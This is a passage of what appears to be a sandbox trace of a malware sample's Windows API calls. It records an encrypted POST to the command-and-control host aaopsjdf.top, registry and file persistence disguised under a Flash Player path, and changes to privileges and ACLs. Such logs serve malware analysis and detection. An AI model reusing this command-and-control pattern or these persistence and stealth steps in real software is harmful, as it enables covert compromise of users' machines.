pszDest=0x8df004, cchDest=10, pszFmt="%u.%u.%u", arglist=0x8defdc | out: pszDest="2.6.1") returned 5 [0317.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0317.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x235d270, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2.6.1", lpUsedDefaultChar=0x0) returned 5 [0317.776] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x8df1be, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x8def20, pcbStructInfo=0x8def04 | out: pvStructInfo=0x8def20, pcbStructInfo=0x8def04) returned 1 [0317.776] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x4240a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240d0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240d8*, PublicKey.cUnusedBits=0x0), phKey=0x8def10 | out: phKey=0x8def10*=0x45b5d8) returned 1 [0317.776] LocalFree (hMem=0x4240a0) returned 0x0 [0317.776] wvnsprintfA (in: pszDest=0x235c5b0, cchDest=21, pszFmt="%d", arglist=0x8dee24 | out: pszDest="1515610608") returned 10 [0317.777] CryptEncrypt (in: hKey=0x45b5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8ded70*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8ded70*=0x100) returned 1 [0317.777] CryptEncrypt (in: hKey=0x45b5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x238f608*, pdwDataLen=0x8ded84*=0x20, dwBufLen=0x100 | out: pbData=0x238f608*, pdwDataLen=0x8ded84*=0x100) returned 1 [0317.778] CryptDestroyKey (hKey=0x45b5d8) returned 1 [0317.778] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x8dee80 | out: lpUrlComponents=0x8dee80) returned 1 [0317.778] wvnsprintfA (in: pszDest=0x238f340, cchDest=516, pszFmt="%s%s", arglist=0x8deeb8 | out: pszDest="https://aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/") returned 63 [0317.778] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x8dee78 | out: lpUrlComponents=0x8dee78) returned 1 [0317.778] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc000c [0317.778] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0317.778] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0317.778] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0317.778] InternetConnectA (hInternet=0xcc000c, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0317.778] HttpOpenRequestA (hConnect=0xcc0018, lpszVerb="POST", lpszObjectName="/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0024 [0317.778] HttpSendRequestA (hRequest=0xcc0024, lpszHeaders="Connection: close\r\n÷Ä", dwHeadersLength=0x13, lpOptional=0x23a4880, dwOptionalLength=0x2d8) returned 0 [0318.273] InternetQueryOptionA (in: hInternet=0xcc0024, dwOption=0x1f, lpBuffer=0x8ded9c, lpdwBufferLength=0x8deda0 | out: lpBuffer=0x8ded9c, lpdwBufferLength=0x8deda0) returned 1 [0318.273] InternetSetOptionA (hInternet=0xcc0024, dwOption=0x1f, lpBuffer=0x8ded9c, dwBufferLength=0x4) returned 1 [0318.273] HttpSendRequestA (in: hRequest=0xcc0024, lpszHeaders="Connection: close\r\n÷Ä", dwHeadersLength=0x13, lpOptional=0x23a4880*, dwOptionalLength=0x2d8 | out: lpOptional=0x23a4880*) returned 1 [0318.730] HttpQueryInfoA (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x8ded9c, lpdwBufferLength=0x8deda0, lpdwIndex=0x0 | out: lpBuffer=0x8ded9c*, lpdwBufferLength=0x8deda0*=0x4, lpdwIndex=0x0) returned 1 [0318.730] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.730] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x2399950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x8deeb0 | out: lpBuffer=0x2399950*, lpdwNumberOfBytesRead=0x8deeb0*=0x1000) returned 1 [0318.731] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.731] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x239a950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x8deeb0 | out: lpBuffer=0x239a950*, lpdwNumberOfBytesRead=0x8deeb0*=0x698) returned 1 [0318.731] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.731] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x239afe8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x8deeb0 | out: lpBuffer=0x239afe8*, lpdwNumberOfBytesRead=0x8deeb0*=0x0) returned 1 [0318.732] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0318.733] InternetQueryOptionA (in: hInternet=0xcc0018, dwOption=0x15, lpBuffer=0x8deeac, lpdwBufferLength=0x8deea8 | out: lpBuffer=0x8deeac, lpdwBufferLength=0x8deea8) returned 1 [0318.733] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0318.733] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0318.734] CryptImportKey (in: hProv=0x3de630, pbData=0x238f340, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x8df34c | out: phKey=0x8df34c*=0x45b718) returned 1 [0318.734] CryptCreateHash (in: hProv=0x3de630, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x8df340 | out: phHash=0x8df340) returned 1 [0318.734] CryptHashData (hHash=0x45b598, pbData=0x239b2c8, dwDataLen=0x6f0, dwFlags=0x0) returned 1 [0318.734] CryptVerifySignatureW (hHash=0x45b598, pbSignature=0x238f718, dwSigLen=0x100, hPubKey=0x45b718, szDescription=0x0, dwFlags=0x0) returned 1 [0318.735] CryptDestroyHash (hHash=0x45b598) returned 1 [0318.735] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x8df31c, lpdwDisposition=0x0 | out: phkResult=0x8df31c*=0x324, lpdwDisposition=0x0) returned 0x0 [0318.735] RegSetValueExW (in: hKey=0x324, lpValueName="Omegovna", Reserved=0x0, dwType=0x3, lpData=0x239b2c8*, cbData=0x6f0 | out: lpData=0x239b2c8*) returned 0x0 [0318.735] RegCloseKey (hKey=0x324) returned 0x0 [0318.735] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x324 [0318.736] WriteFile (in: hFile=0x324, lpBuffer=0x239b2c8*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x8df32c, lpOverlapped=0x0 | out: lpBuffer=0x239b2c8*, lpNumberOfBytesWritten=0x8df32c*=0x6f0, lpOverlapped=0x0) returned 1 [0318.736] CloseHandle (hObject=0x324) returned 1 [0318.736] GetCurrentThread () returned 0xfffffffe [0318.736] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x8df304 | out: TokenHandle=0x8df304*=0x0) returned 0 [0318.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x8df304 | out: TokenHandle=0x8df304*=0x324) returned 1 [0318.736] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x8df2f8 | out: lpLuid=0x8df2f8*(LowPart=0x8, HighPart=0)) returned 1 [0318.739] AdjustTokenPrivileges (in: TokenHandle=0x324, DisableAllPrivileges=0, NewState=0x8df2f4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0318.739] GetLastError () returned 0x514 [0318.739] CloseHandle (hObject=0x324) returned 1 [0318.739] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0318.740] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x333e5b8, lpbSaclPresent=0x8df31c, pSacl=0x8df328, lpbSaclDefaulted=0x8df320 | out: lpbSaclPresent=0x8df31c, pSacl=0x8df328, lpbSaclDefaulted=0x8df320) returned 1 [0318.740] SetNamedSecurityInfoW () returned 0x0 [0318.740] LocalFree (hMem=0x333e5b8) returned 0x0 [0318.740] GetNamedSecurityInfoW () returned 0x0 [0318.740] AllocateAndInitializeSid (in: pIdentifierAuthority=0x8df2e8, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x8df2f8 | out: pSid=0x8df2f8*=0x44edb0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0318.740] SetEntriesInAclW () returned 0x0 [0318.740] SetNamedSecurityInfoW () returned 0x0 [0318.741] LocalFree (hMem=0x42a3c0) returned 0x0 [0318.741] LocalFree (hMem=0x449b68) returned 0x0 [0318.742] CryptDestroyKey (hKey=0x45b718) returned 1 [0318.742] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x324 [0318.742] WaitForSingleObject (hHandle=0x324, dwMilliseconds=0xffffffff) returned 0x0 [0318.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x8de970 | out: phkResult=0x8de970*=0x460) returned 0x0 [0318.742] RegQueryValueExW (in: hKey=0x460, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x8de99c, lpData=0x0, lpcbData=0x8de984*=0x0 | out: lpType=0x8de99c*=0x3, lpData=0x0, lpcbData=0x8de984*=0x6f0) returned 0x0 [0318.742] RegQueryValueExW (in: hKey=0x460, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x8de99c, lpData=0x238f968, lpcbData=0x8de984*=0x6f0 | out: lpType=0x8de99c*=0x3, lpData=0x238f968*, lpcbData=0x8de984*=0x6f0) returned 0x0 [0318.742] RegCloseKey (hKey=0x460) returned 0x0 [0318.742] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x8de984, lpdwDisposition=0x0 | out: phkResult=0x8de984*=0x460, lpdwDisposition=0x0) returned 0x0 [0318.742] RegSetValueExW (in: hKey=0x460, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x38f0318*, cbData=0x6f0 | out: lpData=0x38f0318*) returned 0x0 [0318.742] RegCloseKey (hKey=0x460) returned 0x0 [0318.742] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x324 [0318.742] WaitForSingleObject (hHandle=0x324, dwMilliseconds=0xffffffff) returned 0x0 [0318.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x8df0a8 | out: phkResult=0x8df0a8*=0x460) returned 0x0 [0318.743] RegQueryValueExW (in: hKey=0x460, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x8df0d4, lpData=0x0, lpcbData=0x8df0bc*=0x0 | out: lpType=0x8df0d4*=0x3, lpData=0x0, lpcbData=0x8df0bc*=0x6f0) returned 0x0 [0318.743] RegQueryValueExW (in: hKey=0x460, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x8df0d4, lpData=0x238f968, lpcbData=0x8df0bc*=0x6f0 | out: lpType=0x8df0d4*=0x3, lpData=0x238f968*, lpcbData=0x8df0bc*=0x6f0) returned 0x0 [0318.743] RegCloseKey (hKey=0x460) returned 0x0 [0318.743] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x8df0bc, lpdwDisposition=0x0 | out: phkResult=0x8df0bc*=0x460, lpdwDisposition=0x0) returned 0x0 [0318.743] RegSetValueExW (in: hKey=0x460, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x38f0318*, cbData=0x6f0 | out: lpData=0x38f0318*) returned 0x0 [0318.743] RegCloseKey (hKey=0x460) returned 0x0 [0318.743] GetSystemTime (in: lpSystemTime=0x8df8f0 | out: lpSystemTime=0x8df8f0*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x31, wMilliseconds=0x255)) [0318.743] SystemTimeToFileTime (in: lpSystemTime=0x8df8f0, lpFileTime=0x8df900 | out: lpFileTime=0x8df900) returned 1 [0318.743] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x8df978, nSize=0x8df924 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x8df924) returned 0x1 [0318.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="61") returned 2 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="AB") returned 2 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="4C") returned 2 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="4A") returned 2 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="E0") returned 2 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="82") returned 2 [0318.743] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="20") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="DC") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="59") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="11") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="D6") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="7B") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="8E") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="FC") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="F1") returned 2 [0318.744] wvnsprintfW (in: pszDest=0x8df698, cchDest=3, pszFmt="%02X", arglist=0x8df674 | out: pszDest="07") returned 2 [0318.744] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="61AB4C4AE08220DC5911D67B8EFCF107") returned 0x324 [0318.744] WaitForSingleObject (hHandle=0x324, dwMilliseconds=0xffffffff) returned 0x0 [0318.744] PathSkipRootW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys")) returned 0x2010 [0318.744] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin") returned 1 [0318.745] GetCurrentThread () returned 0xfffffffe [0318.745] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x8df90c | out: TokenHandle=0x8df90c*=0x0) returned 0 [0318.745] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x8df90c | out: TokenHandle=0x8df90c*=0x460) returned 1 [0318.745] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x8df900 | out: lpLuid=0x8df900*(LowPart=0x8, HighPart=0)) returned 1 [0318.745] AdjustTokenPrivileges (in: TokenHandle=0x460, DisableAllPrivileges=0, NewState=0x8df8fc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0318.745] GetLastError () returned 0x514 [0318.745] CloseHandle (hObject=0x460) returned 1 [0318.745] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0318.745] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x333e5b8, lpbSaclPresent=0x8df924, pSacl=0x8df930, lpbSaclDefaulted=0x8df928 | out: lpbSaclPresent=0x8df924, pSacl=0x8df930, lpbSaclDefaulted=0x8df928) returned 1 [0318.745] SetNamedSecurityInfoW () returned 0x0 [0318.746] LocalFree (hMem=0x333e5b8) returned 0x0 [0318.746] GetNamedSecurityInfoW () returned 0x0 [0318.746] AllocateAndInitializeSid (in: pIdentifierAuthority=0x8df8f0, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x8df900 | out: pSid=0x8df900*=0x44ee58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0318.746] SetEntriesInAclW () returned 0x0 [0318.746] SetNamedSecurityInfoW () returned 0x0 [0318.747] LocalFree (hMem=0x42a3c0) returned 0x0 [0318.747] LocalFree (hMem=0x449b68) returned 0x0 [0318.747] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0318.747] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x8df944 | out: lpFileSize=0x8df944*=0) returned 1 [0318.747] wvnsprintfA (in: pszDest=0x235c290, cchDest=21, pszFmt="%d", arglist=0x8df8a0 | out: pszDest="0") returned 1 [0318.747] wvnsprintfA (in: pszDest=0x235bf98, cchDest=21, pszFmt="%d", arglist=0x8df8a0 | out: pszDest="1515610609") returned 10 [0318.747] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0318.747] WriteFile (in: hFile=0x460, lpBuffer=0x238ee50*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x8df94c, lpOverlapped=0x0 | out: lpBuffer=0x238ee50*, lpNumberOfBytesWritten=0x8df94c*=0xab, lpOverlapped=0x0) returned 1 [0318.748] CloseHandle (hObject=0x460) returned 1 Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x62aa5000" os_pid = "0x7f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x6a4" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2891 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2893 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2894 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2895 start_va = 0x70000 end_va = 0x8bfff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2896 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2897 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2898 start_va = 0x960000 end_va = 0x967fff entry_point = 0x960000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe") Region: id = 2899 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2900 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2901 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2902 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2903 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2904 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2905 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 